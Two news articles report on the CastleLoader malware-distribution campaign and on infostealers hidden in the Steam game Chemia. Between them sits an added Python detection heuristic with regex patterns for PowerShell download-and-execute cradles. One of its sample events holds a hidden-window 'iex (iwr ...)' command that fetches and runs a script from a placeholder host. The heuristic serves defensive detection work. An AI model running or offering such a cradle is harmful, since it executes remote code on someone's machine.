CastleLoader Malware Campaign Hits U.S. Government and Developers

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

A new and dangerous malware called CastleLoader is infecting users through fake websites and GitHub repositories.

In a rush? Here are the quick facts:

  • CastleLoader malware infected 469 devices, including U.S. government systems.
  • Malware spreads via fake ClickFix updates and GitHub repos.
  • GitHub deception tricks developers into downloading malicious files.

Since its discovery in early 2025, CastleLoader has infected at least 469 devices across the world, including U.S. government systems, as first reported by cybersecurity firm PRODAFT.

Researchers explain that CastleLoader functions as a malware distribution platform, which spreads RedLine alongside StealC, DeerStealer, NetSupport RAT, and HijackLoader.

The malicious programs enable attackers to steal passwords, cookies, and crypto wallets, while providing them with remote access to victim devices.

Attackers use fake ClickFix phishing sites that mimic legitimate sources, such as Google Meet, browser updates, and document checks. Users who follow the fake error-correction instructions shown on screen end up running malicious PowerShell commands, which start the infection chain without their knowledge.
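As an added defender-side illustration (not code from PRODAFT or from the article), the following Python heuristic flags process-creation events that fit the ClickFix pattern just described: a script interpreter launched from the desktop shell with a fetch-and-run command line. Field names loosely follow Sysmon Event ID 1 and the sample events are constructed, so treat both as assumptions.

```python
import re

# Interpreters a ClickFix lure typically tells the victim to paste into (assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line fragments typical of a fetch-and-execute cradle (label, regex).
CRADLE_PATTERNS = [
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("web download", r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b"),
    ("encoded command", r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
    ("hidden window", r"-w(indowstyle)?\s+hidden"),
    ("mshta remote", r"mshta(\.exe)?\s+https?://"),
]

def base_name(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def clickfix_indicators(event):
    """Return the indicators matched by one process-creation event ([] if none)."""
    if base_name(event.get("Image", "")) not in INTERPRETERS:
        return []
    cmd = event.get("CommandLine", "")
    hits = [label for label, rx in CRADLE_PATTERNS if re.search(rx, cmd, re.IGNORECASE)]
    # The Run dialog (Win+R) spawns under explorer.exe, so note that parent as context.
    if hits and base_name(event.get("ParentImage", "")) == "explorer.exe":
        hits.append("spawned by explorer.exe (Run dialog / shell)")
    return hits

def is_clickfix_like(event):
    """Alert when a cradle fragment is present and either the parent is the
    desktop shell or at least two cradle fragments co-occur (reduces admin noise)."""
    hits = clickfix_indicators(event)
    cradle = [h for h in hits if not h.startswith("spawned")]
    return bool(cradle) and (len(hits) > len(cradle) or len(cradle) >= 2)

# Constructed sample events (Sysmon Event ID 1 field names; not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/fix.ps1)"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --profile-directory=Default"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_clickfix_like(ev), clickfix_indicators(ev))
```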

“Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said, as reported by The Hacker News.

“Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape,” the researchers added.

CastleLoader also spreads through fake GitHub repositories that appear to host trusted developer tools. Users who visit these deceptive pages end up installing malware because they trust the GitHub platform.

The researchers identify this malware as part of a broader malware-as-a-service (MaaS) operation. Its command-and-control (C2) panel gives operators real-time capabilities to manage infected systems, execute attacks, and modify their campaigns.

“This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT noted.

With an infection rate of nearly 29%, experts warn users to avoid unfamiliar update sites and double-check all software sources.

Hackers Use Steam Game To Secretly Steal User Data

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Hackers used a Steam game called Chemia to hide malware that secretly steals player data.

In a rush? Here are the quick facts:

  • The game delivered HijackLoader and Vidar infostealers to user devices.
  • Malware connected to a Telegram-based command-and-control system.
  • The attack was stealthy, with no impact on gameplay performance.

The hacking group EncryptHub secretly embedded info-stealing malware into the early access Steam game Chemia, putting unsuspecting players at risk.

BleepingComputer, which first reported this story, explains that Chemia, a survival crafting game by Aether Forge Studios, is still in early access and has no official release date.

According to cybersecurity firm Prodaft, the compromise began on July 22 when EncryptHub added malicious files to the game.

“Did you play Chemia on Steam? 🎮 Then you should be worried. LARVA-208’s modification of the game to distribute Fickle Stealer, HijackLoader and Vidar demonstrates a concerning trend. ➡️Check the IOCs now: https://t.co/heavBpufeD #threatintel #cybersecurity #malware #IOC” — PRODAFT (@PRODAFT), July 23, 2025

The first malware, HijackLoader (CVKRUTNP.exe), establishes persistent access to the device before downloading the Vidar info-stealer. The malware communicates with its command-and-control server through a Telegram channel.

The second malware, Fickle Stealer, was added through a DLL file named cclib.dll just three hours after the initial malware deployment. The file runs PowerShell scripts that retrieve its main payload from an untrustworthy domain.

BleepingComputer explains that the Fickle Stealer malware steals browser data, including passwords, cookies and cryptocurrency wallet information.

“The compromised executable appears legitimate to users downloading from Steam, creating an effective social engineering component that relies on platform trust rather than traditional deception techniques,” Prodaft told BleepingComputer.

“When users click on the Playtest of this game, which they find in the free games, they are actually downloading malicious software,” the researchers added.

The malware runs silently, without disrupting gameplay, so most players remain unaware that their data is being stolen. The exact method through which EncryptHub accessed the game remains unknown, but insider involvement seems probable.

The game developers have not made any public announcements about the situation, while the game continues to remain live on Steam.

BleepingComputer notes that this is the third malware case involving early access Steam games this year. Until an official investigation is completed, experts recommend avoiding Chemia and being cautious with early access titles.